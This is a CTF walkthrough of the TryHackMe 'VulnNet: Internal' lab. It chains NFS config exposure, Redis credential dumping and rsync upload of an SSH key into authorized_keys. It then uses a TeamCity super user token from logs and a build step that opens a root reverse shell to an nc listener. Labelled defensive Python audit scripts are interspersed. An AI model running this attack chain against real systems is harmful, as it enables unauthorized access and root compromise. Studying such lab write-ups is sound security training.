VulnNet: Internal

TryHackMe: VulnNet: Internal by MindOverflow

VulnNet Entertainment is a company that learns from its mistakes. They quickly realized that they can't make a properly secured web application so they gave up on that idea. Instead, they decided to set up internal services for business purposes. As usual, you're tasked to perform a penetration test of their network and report your findings.

Difficulty: Easy/Medium
Operating System: Linux

This machine was designed to be quite the opposite of the previous machines in this series and it focuses on internal services. It's supposed to show you how you can retrieve interesting information and use it to gain system access. Report your findings by submitting the correct flags.

Note: It might take 3-5 minutes for all the services to boot.

Author: TheCyb3rW0lf
Discord: CyberWølf#8594

Icon made by Freepik from www.flaticon.com

Enumeration

Let's throw an entry into /etc/hosts and fire up rustscan:

└──╼ $rustscan -a vulnetint -- -sC -sV -A -oA vulnetint -vv
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Real hackers hack time ⌛

[~] The config file is expected to be at "/home/tj/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. 
Open 10.10.206.9:22
Open 10.10.206.9:111
Open 10.10.206.9:139
Open 10.10.206.9:445
Open 10.10.206.9:873
Open 10.10.206.9:2049
Open 10.10.206.9:6379
Open 10.10.206.9:41887
Open 10.10.206.9:43419
Open 10.10.206.9:46523
Open 10.10.206.9:59159
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")

[~] Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-28 20:11 BST
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 20:11
Completed NSE at 20:11, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 20:11
Completed NSE at 20:11, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 20:11
Completed NSE at 20:11, 0.00s elapsed
Initiating Ping Scan at 20:11
Scanning 10.10.206.9 [2 ports]
Completed Ping Scan at 20:11, 0.04s elapsed (1 total hosts)
Initiating Connect Scan at 20:11
Scanning vulnetint (10.10.206.9) [11 ports]
Discovered open port 445/tcp on 10.10.206.9
Discovered open port 139/tcp on 10.10.206.9
Discovered open port 111/tcp on 10.10.206.9
Discovered open port 22/tcp on 10.10.206.9
Discovered open port 46523/tcp on 10.10.206.9
Discovered open port 41887/tcp on 10.10.206.9
Discovered open port 6379/tcp on 10.10.206.9
Discovered open port 873/tcp on 10.10.206.9
Discovered open port 59159/tcp on 10.10.206.9
Discovered open port 2049/tcp on 10.10.206.9
Discovered open port 43419/tcp on 10.10.206.9
Completed Connect Scan at 20:11, 0.08s elapsed (11 total ports)
Initiating Service scan at 20:11
Scanning 11 services on vulnetint (10.10.206.9)
Completed Service scan at 20:11, 16.19s elapsed (11 services on 1 host)
NSE: Script scanning 10.10.206.9.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 20:11
Completed NSE at 20:11, 2.15s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 20:11
Completed NSE at 20:11, 0.18s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 20:11
Completed NSE at 20:11, 0.00s elapsed
Nmap scan report for vulnetint (10.10.206.9)
Host is up, received conn-refused (0.040s latency).
Scanned at 2021-07-28 20:11:16 BST for 19s

PORT      STATE SERVICE     REASON  VERSION
22/tcp    open  ssh         syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 5e:27:8f:48:ae:2f:f8:89:bb:89:13:e3:9a:fd:63:40 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDagA3GVO7hKpJpO1Vr6+z3Y9xjoeihZFWXSrBG2MImbpPH6jk+1KyJwQpGmhMEGhGADM1LbmYf3goHku11Ttb0gbXaCt+mw1Ea+K0H00jA0ce2gBqev+PwZz0ysxCLUbYXCSv5Dd1XSa67ITSg7A6h+aRfkEVN2zrbM5xBQiQv6aBgyaAvEHqQ73nZbPdtwoIGkm7VL9DATomofcEykaXo3tmjF2vRTN614H0PpfZBteRpHoJI4uzjwXeGVOU/VZcl7EMBd/MRHdspvULJXiI476ID/ZoQLT2zQf5Q2vqI3ulMj5CB29ryxq58TVGSz/sFv1ZBPbfOl9OvuBM5BTBV
|   256 f4:fe:0b:e2:5c:88:b5:63:13:85:50:dd:d5:86:ab:bd (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNM0XfxK0hrF7d4C5DCyQGK3ml9U0y3Nhcvm6N9R+qv2iKW21CNEFjYf+ZEEi7lInOU9uP2A0HZG35kEVmuideE=
|   256 82:ea:48:85:f0:2a:23:7e:0e:a9:d9:14:0a:60:2f:ad (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJPRO3XCBfxEo0XhViW8m/V+IlTWehTvWOyMDOWNJj+i
111/tcp   open  rpcbind     syn-ack 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  3           2049/udp   nfs
|   100003  3           2049/udp6  nfs
|   100003  3,4         2049/tcp   nfs
|   100003  3,4         2049/tcp6  nfs
|   100005  1,2,3      46523/tcp   mountd
|   100005  1,2,3      51879/udp   mountd
|   100005  1,2,3      52807/tcp6  mountd
|   100005  1,2,3      59253/udp6  mountd
|   100021  1,3,4      33920/udp6  nlockmgr
|   100021  1,3,4      41021/tcp6  nlockmgr
|   100021  1,3,4      41887/tcp   nlockmgr
|   100021  1,3,4      44664/udp   nlockmgr
|   100227  3           2049/tcp   nfs_acl
|   100227  3           2049/tcp6  nfs_acl
|   100227  3           2049/udp   nfs_acl
|_  100227  3           2049/udp6  nfs_acl
139/tcp   open  netbios-ssn syn-ack Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp   open  netbios-ssn syn-ack Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
873/tcp   open  rsync       syn-ack (protocol version 31)
2049/tcp  open  nfs_acl     syn-ack 3 (RPC #100227)
6379/tcp  open  redis       syn-ack Redis key-value store
41887/tcp open  nlockmgr    syn-ack 1-4 (RPC #100021)
43419/tcp open  mountd      syn-ack 1-3 (RPC #100005)
46523/tcp open  mountd      syn-ack 1-3 (RPC #100005)
59159/tcp open  mountd      syn-ack 1-3 (RPC #100005)
Service Info: Host: VULNNET-INTERNAL; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -40m00s, deviation: 1h09m16s, median: 0s
| nbstat: NetBIOS name: VULNNET-INTERNA, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
|   VULNNET-INTERNA<00>  Flags: <unique><active>
|   VULNNET-INTERNA<03>  Flags: <unique><active>
|   VULNNET-INTERNA<20>  Flags: <unique><active>
|   WORKGROUP<00>        Flags: <group><active>
|   WORKGROUP<1e>        Flags: <group><active>
| Statistics:
|   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|_  00 00 00 00 00 00 00 00 00 00 00 00 00 00
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 24150/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 44345/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 12822/udp): CLEAN (Failed to receive data)
|   Check 4 (port 31018/udp): CLEAN (Failed to receive data)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
|   Computer name: vulnnet-internal
|   NetBIOS computer name: VULNNET-INTERNAL\x00
|   Domain name: \x00
|   FQDN: vulnnet-internal
|_  System time: 2021-07-28T21:11:33+02:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-07-28T19:11:33
|_  start_date: N/A

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 20:11
Completed NSE at 20:11, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 20:11
Completed NSE at 20:11, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 20:11
Completed NSE at 20:11, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.28 seconds

NFS

Looking at the above, NFS is open, so let's take a look:

└──╼ $showmount -e vulnetint
Export list for vulnetint:
/opt/conf *

We have a conf directory exported, so let's mount that and take a look.

┌─[tj@parrotos]─[~/pentest/ctfs/vulnetint]
└──╼ $mkdir conf
┌─[tj@parrotos]─[~/pentest/ctfs/vulnetint]
└──╼ $sudo mount vulnetint:/opt/conf conf
┌─[tj@parrotos]─[~/pentest/ctfs/vulnetint]
└──╼ $ls conf/
hp  init  opt  profile.d  redis  vim  wildmidi
┌─[tj@parrotos]─[~/pentest/ctfs/vulnetint/conf]
└──╼ $ls *
hp:
hplip.conf

init:
anacron.conf  lightdm.conf  whoopsie.conf

opt:

profile.d:
bash_completion.sh  cedilla-portuguese.sh  input-method-config.sh  vte-2.91.sh

redis:
redis.conf

vim:
vimrc  vimrc.tiny

wildmidi:
wildmidi.cfg

Looking through the files, the following lines in redis.conf look interesting:

slave-serve-stale-data yes

requirepass "[REDACTED]"

They might have reused that password, so we'll bank it.
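As an added example (not from the original writeup), here is a small Python audit that ties the two findings together from the defender's side: it parses showmount -e output and a redis.conf fragment, both constructed here, and flags a requirepass that sits inside a directory exported to every client, along with a non-loopback bind and protected-mode no. The config path /opt/conf/redis/redis.conf is assumed from the mounted listing above; the bind and protected-mode lines are part of the constructed sample, not something the page shows.

```python
import shlex

# Constructed sample of `showmount -e` output, modelled on the target's
# export list (a whole config directory exported to every client).
SHOWMOUNT_OUTPUT = """Export list for vulnetint:
/opt/conf *
/srv/backup 10.10.0.0/16
"""

# Constructed redis.conf fragment; [REDACTED] stands in for the real password.
REDIS_CONF = """# Redis configuration (constructed sample)
bind 0.0.0.0
protected-mode no
port 6379
slave-serve-stale-data yes
requirepass "[REDACTED]"
"""

LOOPBACK = {"127.0.0.1", "::1", "-::1"}


def parse_showmount(text):
    """Return [(export_path, client_spec), ...] from `showmount -e` output."""
    exports = []
    for line in text.splitlines()[1:]:  # first line is the "Export list for" header
        parts = line.split(None, 1)
        if len(parts) == 2:
            exports.append((parts[0], parts[1].strip()))
    return exports


def parse_redis_conf(text):
    """Return {directive: value}; comments are skipped and quoted values unquoted
    (shlex is an approximation of Redis' own quoting rules)."""
    conf = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)
        conf[parts[0].lower()] = " ".join(shlex.split(parts[1])) if len(parts) == 2 else ""
    return conf


def audit(showmount_text, redis_conf_text, conf_path="/opt/conf/redis/redis.conf"):
    """Cross-check the export list against the Redis config and return findings.
    conf_path is where the config lives on the NFS server (assumed here)."""
    findings = []
    conf = parse_redis_conf(redis_conf_text)
    for path, clients in parse_showmount(showmount_text):
        if clients != "*":
            continue
        findings.append(f"export {path} is readable by any client")
        if "requirepass" in conf and conf_path.startswith(path.rstrip("/") + "/"):
            findings.append(f"requirepass in {conf_path} is exposed through export {path}")
    bind = conf.get("bind", "").split()  # no bind directive means all interfaces
    if not bind or any(addr not in LOOPBACK for addr in bind):
        findings.append("redis listens on non-loopback address(es): " + (" ".join(bind) or "all"))
    if conf.get("protected-mode", "yes").lower() == "no":
        findings.append("protected-mode is disabled")
    return findings
```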

Samba

└──╼ $smbclient -N -L //vulnetint

	Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers
	shares          Disk      VulnNet Business Shares
	IPC$            IPC       IPC Service (vulnnet-internal server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available

Let's take a look in shares:

└──╼ $smbclient -N //vulnetint/shares
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Tue Feb  2 09:20:09 2021
  ..                                  D        0  Tue Feb  2 09:28:11 2021
  temp                                D        0  Sat Feb  6 11:45:10 2021
  data                                D        0  Tue Feb  2 09:27:33 2021

		11309648 blocks of size 1024. 3276124 blocks ava

Here, under temp, we find our first flag:

smb: \> cd temp
smb: \temp\> ls
  .                                   D        0  Sat Feb  6 11:45:10 2021
  ..                                  D        0  Tue Feb  2 09:20:09 2021
  services.txt                        N       38  Sat Feb  6 11:45:09 2021

		11309648 blocks of size 1024. 3276124 blocks available
smb: \temp\> get services.txt
getting file \temp\services.txt of size 38 as services.txt (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec

Moving on to data, let's grab the files under there:

smb: \> cd data
smb: \data\> ls
  .                                   D        0  Tue Feb  2 09:27:33 2021
  ..                                  D        0  Tue Feb  2 09:20:09 2021
  data.txt                            N       48  Tue Feb  2 09:21:18 2021
  business-req.txt                    N      190  Tue Feb  2 09:27:33 2021

		11309648 blocks of size 1024. 3276124 blocks available
smb: \data\> get data.txt
getting file \data\data.txt of size 48 as data.txt (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec)
smb: \data\> get business-req.txt
getting file \data\business-req.txt of size 190 as business-req.txt (1.0 KiloBytes/sec) (average 0.6 Kilo

Let's take a look at these:

└──╼ $cat data.txt 
Purge regularly data that is not needed anymore

└──╼ $cat business-req.txt 
We just wanted to remind you that we’re waiting for the DOCUMENT you agreed to send us so we can complete the TRANSACTION we discussed.
If you have any questions, please text or phone us.

Hmm, a bit cryptic and not helpful as of yet. What else was open?

Redis

Using the password we found earlier, we can use nc to connect to Redis and query the server info:

└──╼ $nc vulnetint 6379
auth [REDACTED]
+OK
info 
$2755
# Server
redis_version:4.0.9
redis_git_sha1:00000000
redis_git_dirty:0
redis_build_id:9435c3c2879311f3
redis_mode:standalone
os:Linux 4.15.0-135-generic x86_64
arch_bits:64
multiplexing_api:epoll
atomicvar_api:atomic-builtin
gcc_version:7.4.0
process_id:538
run_id:2b688688620553ed8733a92036cdb5fb00ca868c
tcp_port:6379
uptime_in_seconds:2223
uptime_in_days:0
hz:10
lru_clock:110996
executable:/usr/bin/redis-server
config_file:/etc/redis/redis.conf

# Clients
connected_clients:1
client_longest_output_list:0
client_biggest_input_buf:0
blocked_clients:0

# Memory
used_memory:841488
used_memory_human:821.77K
used_memory_rss:2842624
used_memory_rss_human:2.71M
used_memory_peak:841488
used_memory_peak_human:821.77K
used_memory_peak_perc:100.00%
used_memory_overhead:832358
used_memory_startup:782432
used_memory_dataset:9130
used_memory_dataset_perc:15.46%
total_system_memory:2087923712
total_system_memory_human:1.94G
used_memory_lua:37888
used_memory_lua_human:37.00K
maxmemory:0
maxmemory_human:0B
maxmemory_policy:noeviction
mem_fragmentation_ratio:3.38
mem_allocator:jemalloc-3.6.0
active_defrag_running:0
lazyfree_pending_objects:0

# Persistence
loading:0
rdb_changes_since_last_save:0
rdb_bgsave_in_progress:0
rdb_last_save_time:1627498725
rdb_last_bgsave_status:ok
rdb_last_bgsave_time_sec:-1
rdb_current_bgsave_time_sec:-1
rdb_last_cow_size:0
aof_enabled:0
aof_rewrite_in_progress:0
aof_rewrite_scheduled:0
aof_last_rewrite_time_sec:-1
aof_current_rewrite_time_sec:-1
aof_last_bgrewrite_status:ok
aof_last_write_status:ok
aof_last_cow_size:0

# Stats
total_connections_received:6
total_commands_processed:9
instantaneous_ops_per_sec:0
total_net_input_bytes:190
total_net_output_bytes:525
instantaneous_input_kbps:0.00
instantaneous_output_kbps:0.00
rejected_connections:0
sync_full:0
sync_partial_ok:0
sync_partial_err:0
expired_keys:0
expired_stale_perc:0.00
expired_time_cap_reached_count:0
evicted_keys:0
keyspace_hits:0
keyspace_misses:8
pubsub_channels:0
pubsub_patterns:0
latest_fork_usec:0
migrate_cached_sockets:0
slave_expires_tracked_keys:0
active_defrag_hits:0
active_defrag_misses:0
active_defrag_key_hits:0
active_defrag_key_misses:0

# Replication
role:master
connected_slaves:0
master_replid:7f9d24aef91081f5a01398919e0d1094ac00513b
master_replid2:0000000000000000000000000000000000000000
master_repl_offset:0
second_repl_offset:-1
repl_backlog_active:0
repl_backlog_size:1048576
repl_backlog_first_byte_offset:0
repl_backlog_histlen:0

# CPU
used_cpu_sys:1.55
used_cpu_user:0.92
used_cpu_sys_children:0.00
used_cpu_user_children:0.00

# Cluster
cluster_enabled:0

# Keyspace
db0:keys=5,expires=0,avg_ttl=0

After messing around with Redis, I ended up just dumping it to get the internal flag:

└──╼ $redis-cli -h vulnetint -a [REDACTED] --rdb dump.rdb
Warning: Using a password with '-a' or '-u' option on the command line interface may not be safe.
sending REPLCONF capa eof
SYNC sent to master, writing 762 bytes to 'dump.rdb'
Transfer finished with success.
Transfer finished with success.

└──╼ $grep -a flag dump.rdb 
internal flag%THM{[REDACTED]}

Inside here we also have an "authlist" key, which we can query as below:

vulnetint:6379> select 0
OK
vulnetint:6379> keys *
1) "1"
2) "internal flag"
3) "marketlist"
4) "authlist"
5) "int"
6) "tmp"
vulnetint:6379> lrange authlist 0 99
1) "[REDACTED]="
2) "[REDACTED]="
3) "[REDACTED]="
4) "[REDACTED]="

Running these through base64 we get:

└──╼ $echo [REDACTED]| base64 -d
Authorization for rsync://rsync-connect@127.0.0.1 with password [REDACTED]

We can now use rsync to grab files off the target:

└──╼ $rsync -av rsync://rsync-connect@vulnetint/

From here we can grab user.txt:

cat sys-internal/user.txt

Foothold

OK, using the access via rsync, let's send over our public key:

└──╼ $cat ~/.ssh/id_rsa.pub > .ssh/authorized_keys
└──╼ $chmod 600 .ssh/authorized_keys
└──╼ $rsync -av .ssh/* rsync://rsync-connect@vulnetint/files/sys-internal/.s
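As an added example, not from the original writeup, the following Python audits an rsyncd.conf (a constructed sample here, modelled on the target's files module) for the combination that makes the step above possible: a writable module whose path is a user's home directory, which lets any holder of the shared rsync password plant an authorized_keys file. The global uid = root and the second module in the sample are assumptions for the demonstration, not something the target showed.

```python
# Constructed rsyncd.conf modelled on the target: a module that exposes a
# user's home directory for writing to a shared rsync account. The global
# uid/gid values are assumptions for the sample, not something the target showed.
RSYNCD_CONF = """
uid = root
gid = root
use chroot = yes

[files]
path = /home/sys-internal
comment = Necessary home interaction
read only = no
auth users = rsync-connect
secrets file = /etc/rsyncd.secrets

[public]
path = /srv/public
read only = yes
list = yes
"""

TRUE_VALUES = {"yes", "true", "1"}


def parse_rsyncd_conf(text):
    """Return (global_settings, {module_name: settings}) from rsyncd.conf text."""
    global_settings, modules, current = {}, {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(("#", ";")):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip()
            modules[current] = {}
            continue
        key, _, value = line.partition("=")
        target = modules[current] if current is not None else global_settings
        target[key.strip().lower()] = value.strip()
    return global_settings, modules


def audit_rsyncd(text):
    """Flag modules that let a remote rsync client write files where they matter."""
    global_settings, modules = parse_rsyncd_conf(text)
    findings = []
    for name, settings in modules.items():
        eff = {**global_settings, **settings}  # module settings override global ones
        # rsync defaults: modules are read only and run as uid "nobody"
        writable = eff.get("read only", "yes").lower() not in TRUE_VALUES
        path = eff.get("path", "")
        if writable:
            findings.append(f"[{name}] is writable")
        if not eff.get("auth users"):
            findings.append(f"[{name}] allows anonymous access")
        if writable and (path.startswith("/home/") or path == "/root" or path.startswith("/root/")):
            findings.append(f"[{name}] grants write access inside a home directory ({path})")
        if writable and eff.get("uid", "nobody") == "root":
            findings.append(f"[{name}] writes files as root")
    return findings
```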

└──╼ $ssh sys-internal@vulnetint
Welcome to Ubuntu 18.04 LTS (GNU/Linux 4.15.0-135-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

541 packages can be updated.
342 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

sys-internal@vulnnet-internal:~$ 

Boom!! We are on the box. Unfortunately, we need a password for sudo, so let's see if we can find another privesc route...

Let's copy linpeas.sh across and see what we find:

-rwsr-xr-x 1 root root 621K Feb  1 14:44 /usr/local/bin/sudo  --->  check_if_the_sudo_version_is_vulnerable

╔══════════╣ Unexpected in root
/TeamCity

TeamCity

There is a Java app listening on 127.0.0.1:8111; to access it we will need to do some port forwarding:

└──╼ $ssh -L 8111:127.0.0.1:8111 sys-internal@vulnetint

As no admin account exists, we can create a login using the super user authentication token found in the logs:

sys-internal@vulnnet-internal:/TeamCity/logs$ grep "authentication token" /TeamCity/logs/* 2>/dev/null
/TeamCity/logs/catalina.out:[TeamCity] Super user authentication token: [REDACTED] (use empty username with the token as the password to access the server)
/TeamCity/logs/catalina.out:[TeamCity] Super user authentication token: [REDACTED] (use empty username with the token as the password to access the server)
/TeamCity/logs/catalina.out:[TeamCity] Super user authentication token: [REDACTED] (use empty username with the token as the password to access the server)
/TeamCity/logs/catalina.out:[TeamCity] Super user authentication token: [REDACTED] (use empty username with the token as the password to access the server)
/TeamCity/logs/catalina.out:[TeamCity] Super user authentication token: [REDACTED] (use empty username with the token as the password to access the server)
/TeamCity/logs/catalina.out:[TeamCity] Super user authentication token: [REDACTED] (use empty username with the token as the password to access the server)
/TeamCity/logs/catalina.out:[TeamCity] Super user authentication token: [REDACTED] (use empty username with the token as the password to access the server)
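As an added example (not part of the writeup), here is a small Python scanner a defender could run over catalina.out to report how often the super user token has been written to the log, without copying the token itself into the report, plus a helper to check whether the log's mode bits make it readable by other local users, which is what allowed the unprivileged shell above to read it. The log excerpt is constructed and the token values are placeholders.

```python
import re
import stat
from collections import Counter

# Constructed catalina.out excerpt; the token values are placeholders, not real ones.
CATALINA_OUT = """[TeamCity] Starting TeamCity server
[TeamCity] Super user authentication token: 1111111111111111 (use empty username with the token as the password to access the server)
[TeamCity] TeamCity server started
[TeamCity] Super user authentication token: 2222222222222222 (use empty username with the token as the password to access the server)
[TeamCity] Super user authentication token: 2222222222222222 (use empty username with the token as the password to access the server)
"""

TOKEN_RE = re.compile(r"Super user authentication token:\s*(\S+)")


def redact(token, keep=4):
    """Keep only the last few characters so a report can correlate tokens without exposing them."""
    return "*" * max(len(token) - keep, 0) + token[-keep:]


def scan_catalina(text):
    """Return one finding per distinct super user token found in the log text.
    A distinct token usually means a server restart, since the token is
    regenerated at start-up and logged again each time."""
    counts = Counter()
    first_seen = {}
    for lineno, line in enumerate(text.splitlines(), 1):
        match = TOKEN_RE.search(line)
        if match:
            token = match.group(1)
            counts[token] += 1
            first_seen.setdefault(token, lineno)
    return [
        {"token": redact(token), "occurrences": count, "first_line": first_seen[token]}
        for token, count in counts.items()
    ]


def log_readable_by_others(mode):
    """True when an st_mode value (e.g. os.stat(path).st_mode) grants read to 'other'."""
    return bool(mode & stat.S_IROTH)
```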

Now that we are logged in, we need to find a way to exploit this. TeamCity looks like a build system; digging around, I created a new project and then added a build step that runs a command line script.

I then click Run in the top right, which results in a reverse shell as root:

└──╼ $nc -lvp 8888
Listening on 0.0.0.0 8888



Connection received on vulnetint 34872
/bin/sh: 0: can't access tty; job control turned off
# # # # id
uid=0(root) gid=0(root) groups=0(root)
# cd
# ls
root.txt
# cat root.txt
THM{[REDACTED]}

Done!

Another room done. Although this was an Easy ranked room, it took me longer than I would have liked, in part due to the fact that I do not know a lot about Redis.